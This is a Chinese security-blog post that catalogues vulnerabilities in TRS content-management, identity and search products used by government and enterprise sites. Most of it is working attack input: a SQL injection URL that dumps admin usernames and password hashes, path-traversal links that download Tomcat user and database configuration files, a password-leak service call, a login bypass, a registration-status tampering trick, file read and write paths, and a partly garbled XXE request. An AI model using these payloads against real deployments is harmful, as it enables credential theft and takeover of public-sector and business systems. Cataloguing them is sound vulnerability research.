TRS漏洞整理

  • A+
所属分类:WEB安全

TRS北京拓尔思信息技术股份有限公司,其业务系统主要应用于政府、教育、企业等领域,漏洞较多系统有WCM(内容管理系统)、WAS(文本检索系统)、IDS(身份管理系统)。好多客户用到这个,记录一下。

WCM内容管理系统

WCM5.2~WCM6.5存在SQL注入
首先是这个页面,http://xx.xx.xx/portal/db/dbupdatelog_list.jsp
直接注入

123
http://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOGhttp://agent.trs.cn/portal/db/db ... &OrderType=desc;/**/update/**/WCMDBUPDATELOG/**/set/**/LogTitle=%28select/**/top/**/1/**/UserName%2bPassWord/**/from/**/WCMUSER%29/**/where/**/1=1--&OrderField=TableName&SearchKey=CrTime&PageItemCount=15&SearchTable=WCMDBUPDATELOG

注:存在注入参数为:OrderType 和 OrderField

WCM任意文件下载漏洞

漏洞存在于wcm/app/system/read_image.jsp读取上传图片功能处,可构造链接下载任意文件,列如

1
http://xx.xx.xx/wcm/app/system/read_image.jsp?Filename=../../../tomcat/conf/tomcat-users.xml

读取tomcat配置文件

WCM6.x系列用户密码泄漏

TRS WCM 6.0以上版本某个功能页面调用service限制不严格,可以获取后台管理用户的用户名和密码序列。
访问链接:

1
HTTP://xx.xx.xx/wcm/infoview.do?serviceid=wcm6_user&MethodName=getOnlineUsers

WCM的密码加密方式是:常规32位MD5取前15位;
如果只访问wcm/infoview.do,尽管是个错误页面,比如:
首先访问

1
http://xx.xx.xx/wcm/infoview.do

然后你再访问:

1
http://xx.xx.xx/wcm

WCM用户注册逻辑漏洞
问题出在wcm/console/auth/reg_newuser.jsp文件中
即将随意表单改成STATUS值为30,或增加STATUS字段表单。
然后提交注册
虽然说是“请等待开通!”,但实际上已经开通了,因为STATUS字段已经改成正常了。
直接登陆
虽然没什么权限,但后台存在大量注入等漏洞
可以通过注入直接操作数据库了。

1
http://localhost:9999/wcm/file/read_file.jsp?FileName=U020120628383491551127/../../../../../Tomcat/webapps/wcm/WEB-INF/classes/trsconfig/domain/config.xml&sDownName=xx

直接下载数据库配置文件

WCM6权限绕过

首先访问wcm目录,会自动跳转到登录页面
在网址后加上查看管理员密码的链接:

1
wcm/infoview.do?serviceid=wcm6_user&MethodName=getUsersByNames&UserNames=admin

*之前的漏洞说查看管理员信息的危害不大是因为MD5加密只取半截,并且即使破解还有可能遇到admin账号未启用的问题
这时我们点击浏览器的后退按钮或在地址栏的网址后面直接输入wcm/app/login.jsp,这样就绕过权限登录了

WCM全版本任意文件写入漏洞

这个是16年年初出的漏洞,当初还给北京做过一次排查。
是利用webservices的importDocuments接口匿名访问,加上畸形文件名进行利用,exp下载

IDS身份管理系统

IDS系统任意文件读取和信息泄露漏洞
漏洞文件路径在admin/debug/目录下,读取文件为fv.jsp,信息泄露为env.jsp等,直接访问文件即可

XXE漏洞

使用cloudeye

123456789101112
POST /ids/service?idsServiceType=jitSyncUser HTTP/1.1Host: **.**.**.**User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateCookie: trsidsssosessionid=2382B8AE9E8FB5B441212CE2595F963E**.**.**.**X-Forwarded-For: **.**.**.**Connection: keep-aliveContent-Type: multipart/form-data; boundary=---------------------------1988224119974Content-Length: 196]>&xxe;

资料:https://www.secpulse.com/archives/49564.html

WAS文本检索系统

WAS未授权访问

安装目录下was40/tree文件可以看到一些后台功能
访问was40/passwd/passwd.htm输入一个不存在的用户名会暴露出服务器内网IP地址 同时存在暴力破解用户密码的可能性
未授权发布信息+xss编辑信息的时候未对提交的数据进行过滤,同时存在未对用户是否登录进行验证

WAS任意文件读取

问题出在/was5/web/tree文件下,构造路径可以任意读取文件,这个就创宇提的那个漏洞

1
http://xx.xx.xx/was5/web/tree?treefile=/WEB-INF/classes/com/trs/was/resource/wasconfig.properties

WAS任意文件下载漏洞

问题出在was5/admin/template/download_templet.jsp文件下,构造type参数的值可以任意下载文件,

1
http://xx.xx.xx/was5/admin/template/download_templet.jsp?type=../web/tagscloud

WAS任意文件写入

漏洞文件是was5/admin/template/customize/detailcustomize,构造template的参数值进行任意文件写入
同理还有一个问题文件/was5/admin/template/customize/outlinecustomize,利用方式一样

from

http://reboot.cf/2017/01/12/2017/TRS%E6%BC%8F%E6%B4%9E%E6%95%B4%E7%90%86/

  • 我的微信
  • 这是我的微信扫一扫
  • weinxin
  • 我的微信公众号
  • 我的微信公众号扫一扫
  • weinxin

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: